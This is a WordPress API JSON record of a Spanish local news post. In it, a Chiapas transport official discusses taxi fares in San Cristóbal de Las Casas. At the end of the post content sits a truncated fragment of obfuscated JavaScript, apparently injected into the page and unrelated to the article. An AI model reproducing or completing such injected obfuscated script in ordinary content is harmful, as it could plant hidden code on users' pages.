{"id":8751,"date":"2023-02-18T06:59:24","date_gmt":"2023-02-18T06:59:24","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=8751"},"modified":"2023-02-18T06:59:25","modified_gmt":"2023-02-18T06:59:25","slug":"ante-se-subirse-al-taxi-pregunte-por-los-precios-delegado-del-transporte-en-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=8751","title":{"rendered":"Ante se subirse al taxi pregunte por los precios: Delegado del Transporte en San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2022-06-21-at-3.26.30-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-8753\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2022-06-21-at-3.26.30-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2022-06-21-at-3.26.30-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2022-06-21-at-3.26.30-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2022-06-21-at-3.26.30-PM-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/02\/WhatsApp-Image-2022-06-21-at-3.26.30-PM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal17 de Febrero del 2023. San Crist\u00f3bal de Las Casas.- Juan Carlos Trujillo Guti\u00e9rrez, delegado Altos Tsotsil Tseltal de la Secretar\u00eda de Movilidad y Transporte, asegur\u00f3 que desde hace algunos a\u00f1os San Crist\u00f3bal no ha sufrido ning\u00fan cambio en sus tarifas en la modalidad de Taxi \u201c\u00fanicamente se subi\u00f3 la tarifa en la modalidad de urban o combis\u201d.\u201cD\u00e9jenme comentarles que se ha estado trabajando, ya los grupos de transporte concesionados han estado en contacto con su servidor y el secretario Aquiles Espinoza, quien ha llegado a varias reuniones en San Crist\u00f3bal para tocar diversos temas relacionados al transporte p\u00fablico, donde tengamos un beneficio para la poblaci\u00f3n, porque se tiene que entender que el transporte p\u00fablico persiste por lo servicios que solicita la poblaci\u00f3n\u201d, dijo.Entrevistado en una estaci\u00f3n de radio, consider\u00f3 que debe existir di\u00e1logo para concretar la tarifa que uno requiere, ya que San Crist\u00f3bal ya no es una ciudad de algunos a\u00f1os, y ha crecido desmedidamente, y no tiene las mismas distancias, y al no ser la misma situaci\u00f3n en las calles, el tiempo de traslado tampoco es el mismo, por lo que ha sugerido siempre que se entable un di\u00e1logo entre el chofer y el usuario.\u201cVoy de un lugar a este punto, cu\u00e1nto me cobra usted, por qu\u00e9, recordemos que San Crist\u00f3bal, anteriormente nos sub\u00edamos y nos \u00edbamos  a cualquier lugar y nos cobran 35 pesos, era la tarifa o inclusive en alg\u00fan momento. Con el crecimiento de la ciudad, las distancias ya no son las mismas, es muy importante que el usuario y el ch\u00f3fer haya un di\u00e1logo antes del traslado\u201d, abund\u00f3.Aunque no quiso afirmarlo, dej\u00f3 entrever Trujillo Guti\u00e9rrez, que debe existir una tarifa por convenio, esto mientras se trabajan con los \u00f3rganos t\u00e9cnicos conformado por los transportistas, para que se determine el alza de los cobros de transporte.\u201cHasta ahorita est\u00e1 estipulado entre 35 y 45 pesos el costo del pasaje, si las distancias son mayores,  lo que com\u00fanmente usamos, es necesario que el usuario antes de subirse al taxi, le pregunt\u00e9 al conductor cu\u00e1nto es el costo, de d\u00f3nde est\u00e1 a su destino, as\u00ed como se hacen otros lados\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal17 de Febrero del 2023. San Crist\u00f3bal de Las Casas.- Juan Carlos Trujillo Guti\u00e9rrez, delegado Altos Tsotsil Tseltal de la Secretar\u00eda de Movilidad y Transporte, asegur\u00f3 que desde hace algunos a\u00f1os San Crist\u00f3bal no ha sufrido ning\u00fan cambio en sus tarifas en la modalidad de Taxi \u201c\u00fanicamente se subi\u00f3 la tarifa en la modalidad &hellip;<\/p>\n","protected":false},"author":2,"featured_media":8753,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-8751","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8751","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=8751"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8751\/revisions"}],"predecessor-version":[{"id":8754,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/8751\/revisions\/8754"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/8753"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=8751"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=8751"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=8751"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}